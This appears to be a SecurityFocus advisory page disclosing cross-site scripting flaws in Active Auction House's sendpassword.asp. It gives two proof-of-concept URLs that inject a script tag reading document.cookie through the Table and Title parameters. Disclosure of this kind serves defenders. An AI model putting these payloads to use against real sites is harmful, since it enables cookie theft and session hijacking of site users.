Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Active Auction House Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI's are available:
http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title="><script>alert(document.cookie)</script>
http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account







 

Privacy Statement
Copyright 2008, SecurityFocus